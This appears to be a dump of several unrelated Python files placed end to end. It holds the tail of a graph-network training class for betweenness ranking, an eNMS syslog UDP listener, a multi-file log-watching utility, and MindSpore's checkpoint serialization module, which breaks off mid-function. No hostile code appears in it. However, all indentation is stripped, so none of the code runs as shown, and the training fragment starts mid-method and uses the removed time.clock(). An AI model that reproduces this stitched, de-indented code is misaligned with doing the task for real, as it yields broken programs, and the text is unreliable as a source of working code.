save_dir = './../model'
vcfile = '%s/ValidValue.csv' % save_dir
f_out = open(vcfile, 'w')
for iter in range(max_epoch):
print(iter)
num = 0
model.train()
running_loss = 0.0
train_loader = DataLoader(
self.trainSet, batch_size=BATCH_SIZE, shuffle=True, drop_last=False)
for data_batch in train_loader:
num += 1
data_batch = data_batch.to(self.device)
optimizer.zero_grad()
with torch.set_grad_enabled(True):
pred = model(data_batch)
# if flag:
# writer.add_graph(model, data_batch, verbose= True)
# flag = False
true_value = data_batch.y
loss = criterion(pred, true_value)
loss.backward()
optimizer.step()
running_loss += loss.item()
start = time.clock()
if iter and iter % 5000 == 0:
self.gen_new_graph(MIN_SIZE, MAX_SIZE,
types, num_graph=N_TRAIN)
if iter % num_percheck == 0:
if iter == 0:
N_start = start
else:
N_start = N_end
frac_topk, frac_kendal = 0.0, 0.0
test_start = time.time()
for idx in range(N_VALID):
run_time, temp_topk, temp_kendal = self.test(model, idx)
frac_topk += temp_topk / N_VALID
frac_kendal += temp_kendal / N_VALID
test_end = time.time()
# write vc into the file
f_out.write('%.6f, %.6f\n' % (frac_topk, frac_kendal))
f_out.flush()
print('\niter %d, Top0.01: %.6f, kendal: %.6f' %
(iter, frac_topk, frac_kendal))
print('testing %d graphs time: %.2fs' %
(N_VALID, test_end - test_start))
N_end = time.clock()
print('%d iterations total time: %.2fs' %
(num_percheck, N_end - N_start))
print('Training loss is %.4f' % loss)
sys.stdout.flush()
model_path = '%s/nrange_iter_%d_%d_%d.pkl' % (
save_dir, MIN_SIZE, MAX_SIZE, iter)
self.saveModel(model_path, model)
for i, (name, param) in enumerate(model.named_parameters()):
if 'bn' not in name:
writer.add_histogram(name, param, 0)
writer.add_scalar('loss', running_loss, i)
f_out.close()
def predict(self, model, data):
model.eval()
data = data.to(self.device)
pred = model(data).cpu().detach().numpy()
return pred
def test(self, model, idx):
data = self.testSet[idx]
start = time.time()
pred = self.predict(model, data)
writer.add_histogram("%s_pred" % iter, pred)
pred = pred.T.squeeze()
# np.save('%ietr_pred.npy'% iter, pred)
end = time.time()
betw = data.y.cpu().detach().numpy()
# np.save('%ietr_true.npy' % iter, betw)
run_time = end - start
topk = ranktopk(pred, betw, percent=0.01)
kendal, p_value = kd(betw, pred, nan_policy="omit")
return run_time, topk, kendal
def saveModel(self, model_path, model):
torch.save({
'model_weights': model.state_dict()
}, model_path)
print('model has been saved success!')
def findModel(self):
VCFile = './models/ValidValue.csv'
vc_list = []
EarlyStop_start = 2
EarlyStop_length = 1
num_line = 0
for line in open(VCFile):
data = float(line.split(',')[0].strip(',')) # 0:topK; 1:kendal
vc_list.append(data)
num_line += 1
if num_line > EarlyStop_start and data < np.mean(vc_list[-(EarlyStop_length + 1):-1]):
best_vc = num_line
break
best_model_iter = num_percheck * best_vc
best_model = './models/nrange_iter_%d.ckpt' % (best_model_iter)
return best_model
def evaluateSynData(self, model, data_test, model_file=None): # test synthetic data
if model_file is None: # if user do not specify the model_file
model_file = self.findModel()
print('The best model is :%s' % (model_file))
sys.stdout.flush()
self.loadModel(model_file, model)
frac_run_time, frac_topk, frac_kendal = 0.0, 0.0, 0.0
self.clearTestset()
f = open(data_test, 'rb')
ValidData = pickle.load(f)
self.testSet = ValidData
n_test = min(100, len(self.testSet))
for i in tqdm(range(n_test)):
run_time, topk, kendal = self.test(model, i)
frac_run_time += run_time / n_test
frac_topk += topk / n_test
frac_kendal += kendal / n_test
print('\nRun_time, Top0.01, Kendall tau: %.6f, %.6f, %.6f' %
(frac_run_time, frac_topk, frac_kendal))
return frac_run_time, frac_topk, frac_kendal
def evaluateRealData(self, model, model_file, graph_file, label_file): # test real data
g = nx.read_weighted_edgelist(graph_file, nodetype = int)
sys.stdout.flush()
model = model.to(self.device)
self.loadModel(model_file, model)
betw_label = []
for line in open(label_file):
betw_label.append(float(line.strip().split()[1]))
start = time.time()
self.insert_data(g, isTrain=False, label=betw_label)
end = time.time()
run_time = end - start
start1 = time.time()
data = self.testSet[0]
betw_predict = self.predict(model, data)
end1 = time.time()
betw_label = data.y
run_time += end1 - start1
top001 = ranktopk(betw_label, betw_predict, 0.01)
top005 = ranktopk(betw_label, betw_predict, 0.05)
top01 = ranktopk(betw_label, betw_predict, 0.1)
kendal = kd(betw_label, betw_predict)
self.clearTestset()
return top001, top005, top01, kendal, run_time
def loadModel(self, model_path, model):
model_hist = torch.load(model_path)
model.load_state_dict(model_hist['model_weights'])
print('restore model from file successfully')
|
syslog.py | from socketserver import BaseRequestHandler, UDPServer
from threading import Thread
from eNMS.database import db
class SyslogServer:
def __init__(self, ip_address, port):
self.ip_address = ip_address
self.port = port
self.start()
def start(self):
UDPServer.allow_reuse_address = True
self.server = UDPServer((self.ip_address, self.port), SyslogUDPHandler)
th = Thread(target=self.server.serve_forever)
th.daemon = True
th.start()
class SyslogUDPHandler(BaseRequestHandler):
def handle(self):
address = self.client_address[0]
device = db.fetch("device", allow_none=True, ip_address=address)
properties = {
"source": device.name if device else address,
"content": str(bytes.decode(self.request[0].strip())),
}
for event in db.fetch_all("event"):
event.match_log(**properties)
|
watchlogs.py | """A simple log file watcher to provide `tail -F` style functionality across multilple
logfiles. The syntax is simply: `watchlogs --log_files log1.txt,log2.txt,....`
"""
import sys
import math
import time
import argparse
import threading
from typing import Callable, Union, List
from pathlib import Path
import tailf
import psutil
import colored
import humanize
from typeguard import typechecked
def memory_summary():
vmem = psutil.virtual_memory()
msg = (
f">>> Currently using {vmem.percent}% of system memory "
f"{humanize.naturalsize(vmem.used)}/{humanize.naturalsize(vmem.available)}"
)
print(msg)
def get_colors(n_colors):
import hsluv
return [
hsluv.hpluv_to_hex((idx * 360.0 / n_colors, 90, 65))
for idx in range(n_colors)
]
class Watcher:
def __init__(
self,
watched_logs: List[Path],
conserve_resources: int,
heartbeat: bool,
prev_buffer_size: int = 20,
verbose: bool = False,
halting_condition: Callable = None,
):
self._watched_logs = {}
self.verbose = verbose
self.prev_buffer_size = prev_buffer_size
self.heartbeat = heartbeat
self.halting_condition = halting_condition
self.conserve_resources = conserve_resources
colors = get_colors(len(watched_logs))
self.last_path = None
for path, color in zip(watched_logs, colors):
path = Path(path).resolve()
if not path.exists():
with open(path, "w") as f:
f.write("")
self._watched_logs[str(path)] = {
"color": color,
"tailf": tailf.Tail(str(path)),
}
def log_content(self, path, lines, last_mod=False):
color = self._watched_logs[path]["color"]
for line in lines:
summary = ""
if path != self.last_path:
summary += f"\n{path} >>>\n"
summary += line
if last_mod:
summary = f"[stale log] ({last_mod}): {summary}"
print(colored.stylize(summary, colored.fg(color)), flush=True)
self.last_path = path
@typechecked
def watch_log(
self,
path: Union[Path, str],
watcher_idx: int,
total_watchers: int,
):
# Unicode is not very robust to broken line fragments, so we fall back to a
# more permissive (if inaccurate) encoding if UTF-8 fails
try:
with open(path, "r", encoding="utf-8") as f:
lines = f.read().splitlines()
except UnicodeDecodeError:
with open(path, "r", encoding="ISO-8859-1") as f:
lines = f.read().splitlines()
# print as much of the existing file as requested (via prev_buffer_size)
if self.prev_buffer_size > -1:
lines = lines[-self.prev_buffer_size:]
self.log_content(path, lines)
num_digits = math.ceil(math.log(total_watchers, 10))
if not lines:
lines = [""]
latest = {"line": lines[-1], "tic": time.time()}
while True:
if self.halting_condition is not None and self.halting_condition():
return
if self.heartbeat:
if latest["line"] == lines[-1]:
delta = time.time() - latest["tic"]
duration = time.strftime('%Hh%Mm%Ss', time.gmtime(delta))
watcher_str = f"{watcher_idx}".zfill(num_digits)
summary = f"Log {watcher_str}/{total_watchers}"
msg = f"\r{summary} has had no update for {duration}"
print(msg, end="", flush=True)
if self.conserve_resources:
time.sleep(self.conserve_resources)
try:
for event in self._watched_logs[path]["tailf"]:
if isinstance(event, bytes):
try:
line = event.decode("utf-8")
except UnicodeDecodeError:
line = event.decode("ISO-8859-1")
elif event is tailf.Truncated:
line = "File was truncated"
else:
assert False, "unreachable"
lines = [line.rstrip()]
self.log_content(path, lines)
latest = {"line": lines[-1], "tic": time.time()}
except FileNotFoundError:
msg = f"Log at {path} has been removed, exiting watcher thread..."
print(msg, flush=True)
sys.exit()
def run(self):
if len(self._watched_logs) > 1:
threads = []
total = len(self._watched_logs)
for ii, path in enumerate(self._watched_logs):
x = threading.Thread(target=self.watch_log, args=(path, ii, total))
threads.append(x)
x.start()
for x in threads:
x.join()
else:
path = list(self._watched_logs.keys())[0]
self.watch_log(path, watcher_idx=0, total_watchers=1)
def main():
parser = argparse.ArgumentParser(description="watchlogs tool")
parser.add_argument("log_files", help="comma-separated list of logfiles to watch")
parser.add_argument("--pattern",
help=("if supplied, --log_files should point to a directory and "
"`pattern` will be used to glob for files"))
parser.add_argument("--conserve_resources", type=int, default=5,
help=("if true, add a short sleep between log checks to reduce"
"CPU load (will wait for the give number of seconds)"))
parser.add_argument("--heartbeat", type=int, default=1,
help=("if true, print out markers showing that the log watching"
"is still active"))
parser.add_argument("--prev_buffer_size", type=int, default=20,
help=("Print this many lines from the existing file. If set to"
"-1, print the entire file"))
parser.add_argument("--verbose", action="store_true")
parser.add_argument("--max_duration_secs", type=int, default=0,
help="if given, only watch files for at most this duration")
args = parser.parse_args()
if args.pattern:
msg = "if args.pattern is supplied, args.log_files should point to a directory"
assert Path(args.log_files).is_dir(), msg
watched_logs = sorted(list(Path(args.log_files).glob(f"*{args.pattern}")))
print(f"Found {len(watched_logs)} matching pattern: {args.pattern}")
else:
watched_logs = [Path(x) for x in args.log_files.split(",")]
memory_summary()
if args.max_duration_secs:
init_time = time.time()
def halting_condition():
return time.time() - init_time > args.max_duration_secs
else:
halting_condition = None
Watcher(
verbose=args.verbose,
watched_logs=watched_logs,
heartbeat=bool(args.heartbeat),
prev_buffer_size=args.prev_buffer_size,
conserve_resources=args.conserve_resources,
halting_condition=halting_condition,
).run()
if __name__ == "__main__":
main()
|
serialization.py | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Model and parameters serialization."""
import os
import stat
import math
from threading import Thread, Lock
import numpy as np
import mindspore.nn as nn
from mindspore import log as logger
from mindspore.train.checkpoint_pb2 import Checkpoint
from mindspore.train.print_pb2 import Print
from mindspore.train.node_strategy_pb2 import ParallelStrategyMap
from mindspore.common.tensor import Tensor
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
from mindspore.common.api import _executor
from mindspore.common import dtype as mstype
from mindspore._checkparam import check_input_data, Validator
from mindspore.compression.export import quant_export
import mindspore.context as context
__all__ = ["save_checkpoint", "load_checkpoint", "load_param_into_net", "export", "parse_print",
"build_searched_strategy", "merge_sliced_parameter"]
tensor_to_ms_type = {"Int8": mstype.int8, "Uint8": mstype.uint8, "Int16": mstype.int16, "Uint16": mstype.uint16,
"Int32": mstype.int32, "Uint32": mstype.uint32, "Int64": mstype.int64, "Uint64": mstype.uint64,
"Float16": mstype.float16, "Float32": mstype.float32, "Float64": mstype.float64,
"Bool": mstype.bool_}
tensor_to_np_type = {"Int8": np.int8, "Uint8": np.uint8, "Int16": np.int16, "Uint16": np.uint16,
"Int32": np.int32, "Uint32": np.uint32, "Int64": np.int64, "Uint64": np.uint64,
"Float16": np.float16, "Float32": np.float32, "Float64": np.float64, "Bool": np.bool_}
_ckpt_mutex = Lock()
SLICE_SIZE = 512 * 1024 * 1024
def _special_process_par(par, new_par):
"""
Processes the special condition.
Like (12,2048,1,1)->(12,2048), this case is caused by GE 4 dimensions tensor.
"""
par_shape_len = len(par.data.shape)
new_par_shape_len = len(new_par.data.shape)
delta_len = new_par_shape_len - par_shape_len
delta_i = 0
for delta_i in range(delta_len):
if new_par.data.shape[par_shape_len + delta_i] != 1:
break
if delta_i == delta_len - 1:
new_val = new_par.data.asnumpy()
new_val = new_val.reshape(par.data.shape)
par.set_data(Tensor(new_val, par.data.dtype))
return True
return False
def _update_param(param, new_param):
"""Updates param's data from new_param's data."""
if isinstance(param.data, Tensor) and isinstance(new_param.data, Tensor):
if param.data.dtype != new_param.data.dtype:
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, param.data.dtype, new_param.data.dtype))
raise RuntimeError(msg)
if param.data.shape != new_param.data.shape:
if not _special_process_par(param, new_param):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) different from parameter_dict's({})"
.format(param.name, param.data.shape, new_param.data.shape))
raise RuntimeError(msg)
return
param.set_data(new_param.data)
return
if isinstance(param.data, Tensor) and not isinstance(new_param.data, Tensor):
if param.data.shape != (1,) and param.data.shape != ():
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) is not (1,), inconsitent with parameter_dict's(scalar)."
.format(param.name, param.data.shape))
raise RuntimeError(msg)
param.set_data(initializer(new_param.data, param.data.shape, param.data.dtype))
elif isinstance(new_param.data, Tensor) and not isinstance(param.data, Tensor):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, type(param.data), type(new_param.data)))
raise RuntimeError(msg)
else:
param.set_data(type(param.data)(new_param.data))
def _exec_save(ckpt_file_name, data_list):
"""Execute save checkpoint into file process."""
try:
with _ckpt_mutex:
if os.path.exists(ckpt_file_name):
os.remove(ckpt_file_name)
with open(ckpt_file_name, "ab") as f:
for name, value in data_list.items():
data_size = value[2].nbytes
if data_size > SLICE_SIZE:
slice_count = math.ceil(data_size / SLICE_SIZE)
param_slice_list = np.array_split(value[2], slice_count)
else:
param_slice_list = [value[2]]
for param_slice in param_slice_list:
checkpoint_list = Checkpoint()
param_value = checkpoint_list.value.add()
param_value.tag = name
param_tensor = param_value.tensor
param_tensor.dims.extend(value[0])
param_tensor.tensor_type = value[1]
param_tensor.tensor_content = param_slice.tostring()
f.write(checkpoint_list.SerializeToString())
os.chmod(ckpt_file_name, stat.S_IRUSR)
except BaseException as e:
logger.error("Failed to save the checkpoint file %s.", ckpt_file_name)
raise e
def save_checkpoint(save_obj, ckpt_file_name, integrated_save=True, async_save=False):
"""
Saves checkpoint info to a specified file.
Args:
save_obj (nn.Cell or list): The cell object or data list(each element is a dictionary, like
[{"name": param_name, "data": param_data},...], the type of param_name would
be string, and the type of param_data would be parameter or tensor).
ckpt_file_name (str): Checkpoint file name. If the file name already exists, it will be overwritten.
integrated_save (bool): Whether to integrated save in automatic model parallel scene. Default: True
async_save (bool): Whether asynchronous execution saves the checkpoint to a file. Default: False
Raises:
TypeError: If the parameter save_obj is not nn.Cell or list type.And if the parameter integrated_save and
async_save are not bool type.
"""
if not isinstance(save_obj, nn.Cell) and not isinstance(save_obj, list):
raise TypeError("The parameter save_obj should be nn.Cell or list, but got {}".format(type(save_obj)))
integrated_save = Validator.check_bool(integrated_save)
async_save = Validator.check_bool(async_save)
logger.info("Execute save checkpoint process.")
if isinstance(save_obj, nn.Cell):
save_obj.init_parameters_data()
param_dict = {}
for _, param in save_obj.parameters_and_names():
param_dict[param.name] = param
param_list = []
for (key, value) in param_dict.items():
each_param = {"name": key}
param_data = Tensor(value.data)
# in automatic model parallel scenario, some parameters were spliteds to all the devices,
# which should be combined before saving
if integrated_save and key in save_obj.parameter_layout_dict:
param_data = _get_merged_param_data(save_obj, key, param_data)
each_param["data"] = param_data
param_list.append(each_param)
save_obj = param_list
data_list = {}
with _ckpt_mutex:
for param in save_obj:
key = param["name"]
data_list[key] = []
if isinstance(param["data"], Parameter):
param["data"].init_data()
dims = []
if param['data'].shape == ():
dims.append(0)
else:
for dim in param['data'].shape:
dims.append(dim)
data_list[key].append(dims)
tensor_type = str(param["data"].dtype)
data_list[key].append(tensor_type)
data = param["data"].asnumpy().reshape(-1)
data_list[key].append(data)
if async_save:
thr = Thread(target=_exec_save, args=(ckpt_file_name, data_list), name="asyn_save_ckpt")
thr.start()
else:
_exec_save(ckpt_file_name, data_list)
logger.info("Save checkpoint process finish.")
def _check_param_prefix(filter_prefix, param_name):
"""Checks whether the prefix of parameter name matches the given filter_prefix."""
for prefix in filter_prefix:
if param_name.find(prefix) == 0 \
and (param_name == prefix or param_name[len(prefix)] == "." or (prefix and prefix[-1] == ".")):
return True
return False
def load_checkpoint(ckpt_file_name, net=None, strict_load=False, filter_prefix=None):
"""
Loads checkpoint info from a specified file.
Args:
ckpt_file_name (str): Checkpoint file name.
net (Cell): Cell network. Default: None
strict_load (bool): Whether to strict load the parameter into net. If False, it will load parameter
in the param_dict into net with the same suffix. Default: False
filter_prefix (Union[str, list[str], tuple[str]]): Parameter with the filter prefix will not be loaded.
Default: None.
Returns:
Dict, key is parameter name, value is a Parameter.
Raises:
ValueError: Checkpoint file is incorrect.
Examples:
>>> ckpt_file_name = "./checkpoint/LeNet5-2_1875.ckpt"
>>> param_dict = load_checkpoint(ckpt_file_name, filter_prefix="conv1")
"""
if not isinstance(ckpt_file_name, str):
raise ValueError("The ckpt_file_name must be string.")
if not os.path.exists(ckpt_file_name):
raise ValueError("The checkpoint file is not exist.")
if ckpt_file_name[-5:] != ".ckpt":
raise ValueError("Please input the correct checkpoint file name.")
if os.path.getsize(ckpt_file_name) == 0:
raise ValueError("The checkpoint file may be empty, please make sure enter the correct file name.")
if filter_prefix is not None:
if not isinstance(filter_prefix, (str, list, tuple)):
raise TypeError(f"The type of filter_prefix must be str, list[str] or tuple[str] "
f"when filter_prefix is not None, but got {str(type(filter_prefix))}.")
if isinstance(filter_prefix, str):
filter_prefix = (filter_prefix,)
if not filter_prefix:
raise ValueError("The filter_prefix can't be empty when filter_prefix is list or tuple.")
for index, prefix in enumerate(filter_prefix):
if not isinstance(prefix, str):
raise TypeError(f"The type of filter_prefix must be str, list[str] or tuple[str], "
f"but got {str(type(prefix))} at index {index}.")
logger.info("Execute load checkpoint process.")
checkpoint_list = Checkpoint()
try:
with open(ckpt_file_name, "rb") as f:
pb_content = f.read()
checkpoint_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the checkpoint file `%s`, please check the correct of the file.", ckpt_file_name)
raise ValueError(e.__str__())
parameter_dict = {}
try:
param_data_list = []
for element_id, element in enumerate(checkpoint_list.value):
if filter_prefix is not None and _check_param_prefix(filter_prefix, element.tag):
continue
data = element.tensor.tensor_content
data_type = element.tensor.tensor_type
np_type = tensor_to_np_type[data_type]
ms_type = tensor_to_ms_type[data_type]
element_data = np.frombuffer(data, np_type)
param_data_list.append(element_data)
if (element_id == len(checkpoint_list.value) - 1) or \
(element.tag != checkpoint_list.value[element_id + 1].tag):
param_data = np.concatenate((param_data_list), axis=0)
param_data_list.clear()
dims = element.tensor.dims
if dims == [0]:
if 'Float' in data_type:
param_data = float(param_data[0])
elif 'Int' in data_type:
param_data = int(param_data[0])
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
elif dims == [1]:
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
else:
param_dim = []
for dim in dims:
param_dim.append(dim)
param_value = param_data.reshape(param_dim)
parameter_dict[element.tag] = Parameter(Tensor(param_value, ms_type), name=element.tag)
logger.info("Load checkpoint process finish.")
except BaseException as e:
logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
raise RuntimeError(e.__str__())
if not parameter_dict:
raise ValueError(f"The loaded parameter dict is empty after filtering, please check filter_prefix.")
if net is not None:
load_param_into_net(net, parameter_dict, strict_load)
return parameter_dict
def load_param_into_net(net, parameter_dict, strict_load=False):
"""
Loads parameters into network.
Args:
net (Cell): Cell network.
parameter_dict (dict): Parameter dictionary.
strict_load (bool): Whether to strict load the parameter into net. If False, it will load parameter
in the param_dict into net with the same suffix. Default: False
Raises:
TypeError: Argument is not a Cell, or parameter_dict is not a Parameter dictionary.
Examples:
>>> net = LeNet5()
>>> param_dict = load_checkpoint("LeNet5-2_1875.ckpt")
>>> load_param_into_net(net, param_dict)
"""
if not isinstance(net, nn.Cell):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument net should be a Cell, but got {}.".format(type(net)))
raise TypeError(msg)
if not isinstance(parameter_dict, dict):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict should be a dict, but got {}.".format(type(parameter_dict)))
raise TypeError(msg)
strict_load = Validator.check_bool(strict_load)
logger.info("Execute load parameter into net process.")
net.init_parameters_data()
param_not_load = []
for _, param in net.parameters_and_names():
if param.name in parameter_dict:
new_param = parameter_dict[param.name]
if not isinstance(new_param, Parameter):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict element should be a Parameter, but got {}.".format(type(new_param)))
raise TypeError(msg)
_update_param(param, new_param)
else:
param_not_load.append(param.name)
if param_not_load and not strict_load:
_load_dismatch_prefix_params(net, parameter_dict, param_not_load)
logger.debug("Params not matched(in net but not in parameter_dict):")
for param_name in param_not_load:
logger.debug("%s", param_name)
logger.info("Load parameter into net finish, {} parameters has not been loaded.".format(len(param_not_load)))
return param_not_load
def _load_dismatch_prefix_params(net, parameter_dict, param_not_load):
"""When some net parameter did not load, try to continue load."""
prefix_name = ""
longest_name = param_not_load[0]
while prefix_name != longest_name and param_not_load:
logger.debug("Count: {} parameters has not been loaded, try to load continue.".format(len(param_not_load)))
prefix_name = longest_name
for net_param_name in param_not_load:
for dict_name in parameter_dict:
if dict_name.endswith(net_param_name):
prefix_name = dict_name[:-len(net_param_name)]
break
if prefix_name != longest_name:
break
if prefix_name != longest_name:
logger.warning("Remove parameter prefix name: {}, continue to load.".format(prefix_name))
for _, param in net.parameters_and_names():
new_param_name = prefix_name + param.name
if param.name in param_not_load and new_param_name in parameter_dict:
new_param = parameter_dict[new_param_name]
_update_param(param, new_param)
param_not_load.remove(param.name)
def _save_graph(network, file_name):
"""
Saves the graph of network to a file.
Args:
network (Cell): Obtain a pipeline through network for saving graph.
file_name (str): Graph file name into which the graph will be saved.
"""
logger.info("Execute save the graph process.")
graph_proto = network.get_func_graph_proto()
if graph_proto:
with open(file_name, "wb") as f:
f.write(graph_proto)
os.chmod(file_name, stat.S_IRUSR)
def _get_merged_param_data(net, param_name, param_data):
"""
Gets the merged data(tensor) from tensor slice, by device arrangement and tensor map.
Args:
net (Cell): MindSpore network.
param_name(str): The parameter name, which to be combined.
param_data(Tensor):The parameter data on the local device,
It was a slice of the whole parameter data.
Returns:
Tensor, the combined tensor which with the whole data value.
"""
layout = net.parameter_layout_dict[param_name]
if len(layout) < 6:
logger.info("layout dict does not contain the key %s", param_name)
return param_data
dev_mat = layout[0]
tensor_map = layout[1]
field_size = layout[3]
uniform_split = layout[4]
opt_shard_group = layout[5]
if uniform_split == 0:
raise RuntimeError("Save checkpoint only support uniform split tensor now.")
from mindspore.parallel._cell_wrapper import get_allgather_cell
from mindspore.parallel._tensor import _reshape_param_data, _reshape_param_data_with_weight
# while any dim is not equal to -1, means param is split and needs to be merged
# pipeline parallel need to be supported here later
for dim in tensor_map:
if dim != -1 or opt_shard_group:
allgather_net = get_allgather_cell(opt_shard_group)
param_data = allgather_net(param_data)
if field_size:
return _reshape_param_data_with_weight(param_data, dev_mat, field_size)
return _reshape_param_data(param_data, dev_mat, tensor_map)
return param_data
def _fill_param_into_net(net, parameter_list):
"""
Fills parameter_list into net.
Args:
net (Cell): train network.
parameter_list (list): parameters list from ge callback.
"""
parameter_dict = {}
for each_param in parameter_list:
param_name = each_param["name"]
if isinstance(each_param["data"], Parameter):
each_param["data"].init_data()
np_val = each_param["data"].asnumpy()
if np_val.shape == (1,):
parameter_dict[param_name] = Parameter(np_val, name=param_name)
elif np_val.shape == ():
parameter_dict[param_name] = Parameter(Tensor(np_val.tolist(), mstype.pytype_to_dtype(np_val.dtype)),
name=param_name)
else:
parameter_dict[param_name] = Parameter(Tensor(np_val), name=param_name)
load_param_into_net(net, parameter_dict)
def export(net, *inputs, file_name, file_format='AIR', **kwargs):
"""
Export the MindSpore prediction model to a file in the specified format.
Args:
net (Cell): MindSpore network.
inputs (Tensor): Inputs of the `net`.
file_name (str): File name of the model to be exported.
file_format (str): MindSpore currently supports 'AIR', 'ONNX' and 'MINDIR' format for exported model.
- AIR: Ascend Intermidiate Representation. An intermidiate representation format of Ascend model.
Recommended suffix for output file is '.air'.
- ONNX: Open Neural Network eXchange. An open format built to represent machine learning models.
Recommended suffix for output file is '.onnx'.
- MINDIR: MindSpore Native Intermidiate Representation for Anf. An intermidiate representation format
for MindSpore models.
Recommended suffix for output file is '.mindir'.
kwargs (dict): Configuration options dictionary.
- quant_mode: The mode of quant.
- mean: Input data mean. Default: 127.5.
- std_dev: Input data variance. Default: 127.5.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
net = _quant_export(net, *inputs, file_format=file_format, **kwargs)
_export(net, file_name, file_format, *inputs)
def _export(net, file_name, file_format, *inputs):
"""
It is an internal conversion function. Export the MindSpore prediction model to a file in the specified format.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
if file_format == 'GEIR':
logger.warning(f"Format 'GEIR' is deprecated, it would be removed in future release, use 'AIR' instead.")
file_format = 'AIR'
supported_formats = ['AIR', 'ONNX', 'MINDIR']
if file_format not in supported_formats:
raise ValueError(f'Illegal file format {file_format}, it must be one of {supported_formats}')
# When dumping ONNX file, switch network mode to infer when it is training(NOTE: ONNX only designed for prediction)
is_dump_onnx_in_training = net.training and file_format == 'ONNX'
if is_dump_onnx_in_training:
net.set_train(mode=False)
# export model
net.init_parameters_data()
if file_format == 'AIR':
phase_name = 'export.air'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name)
_executor.export(file_name, graph_id)
elif file_format == 'ONNX': # file_format is 'ONNX'
phase_name = 'export.onnx'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id)
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
elif file_format == 'MINDIR': # file_format is 'MINDIR'
phase_name = 'export.mindir'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id, 'mind_ir')
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
# restore network training mode
if is_dump_onnx_in_training:
net.set_train(mode=True)
def _quant_export(network, *inputs, file_format, **kwargs):
"""
Exports MindSpore quantization predict model to deploy with AIR and MINDIR.
"""
if not kwargs.get('quant_mode', None):
return network
supported_device = ["Ascend", "GPU"]
supported_formats = ['AIR', 'MINDIR']
quant_mode_formats = ['AUTO', 'MANUAL']
mean = 127.5 if kwargs.get('mean', None) is None else kwargs['mean']
std_dev = 127.5 if kwargs.get('std_dev', None) is None else kwargs['std_dev']
quant_mode = kwargs['quant_mode']
if quant_mode not in quant_mode_formats:
raise KeyError(f'Quant_mode input is wrong, Please choose the right mode of the quant_mode.')
mean = Validator.check_type("mean", mean, (int, float))
std_dev = Validator.check_type("std_dev", std_dev, (int, float))
if context.get_context('device_target') not in supported_device:
raise KeyError("Unsupported {} device target.".format(context.get_context('device_target')))
if file_format not in supported_formats:
raise ValueError('Illegal file format {}.'.format(file_format))
network.set_train(False)
if file_format == "MINDIR":
if quant_mode == 'MANUAL':
exporter = quant_export.ExportManualQuantNetwork(network, mean, std_dev, *inputs, is_mindir=True)
else:
exporter = quant_export.ExportToQuantInferNetwork(network, mean, std_dev, *inputs, is_mindir=True)
else:
if quant_mode == 'MANUAL':
exporter = quant_export.ExportManualQuantNetwork(network, mean, std_dev, *inputs)
else:
exporter = quant_export.ExportToQuantInferNetwork(network, mean, std_dev, *inputs)
deploy_net = exporter.run()
return deploy_net
def parse_print(print_file_name):
"""
Loads Print data from a specified file.
Args:
print_file_name (str): The file name of saved print data.
Returns:
List, element of list is Tensor.
Raises:
ValueError: The print file may be empty, please make sure enter the correct file name.
"""
print_file_path = os.path.realpath(print_file_name)
if os.path.getsize(print_file_path) == 0:
raise ValueError("The print file may be empty, please make sure enter the correct file name.")
logger.info("Execute load print process.")
print_list = Print()
try:
with open(print_file_path, "rb") as f:
pb_content = f.read()
print_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the print file %s, please check the correct of the file.", print_file_name)
raise ValueError(e.__str__())
tensor_list = []
try:
for print_ in print_list.value:
# String type
if print_.HasField("desc"):
tensor_list.append(print_.desc)
elif print_.HasField("tensor"):
dims = print_.tensor.dims
data_type = print_.tensor.tensor_type
data = print_.tensor.tensor_content
np_type = tensor_to_np_type[data_type]
param_data = np.fromstring(data, np_type)
ms_type = tensor_to_ms_type[data_type]
param_dim = []
for dim in dims:
param_dim.append(dim)
if param_dim:
param_value = param_data.reshape(param_dim)
tensor_list.append(Tensor(param_value, ms_type))
# Scale type
else:
data_type_ = data_type.lower()
if 'float' in data_type_:
param_data = float(param_data[0])
elif 'int' in data_type_:
param_data = int(param_data[0])
elif 'bool' in data_type_:
param_data = bool(param_data[0])
tensor_list.append(Tensor(param_data, ms_type))
except BaseException as e:
logger.error("Failed to load the print file %s.", print_list)
raise RuntimeError(e.__str__())
return tensor_list
def _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even):
"""
Merge data slices to one tensor with whole data when strategy is not None.
Args:
sliced_data (list[numpy.ndarray]): Data slices in order of rank_id.
parameter_name (str): Name of parameter.
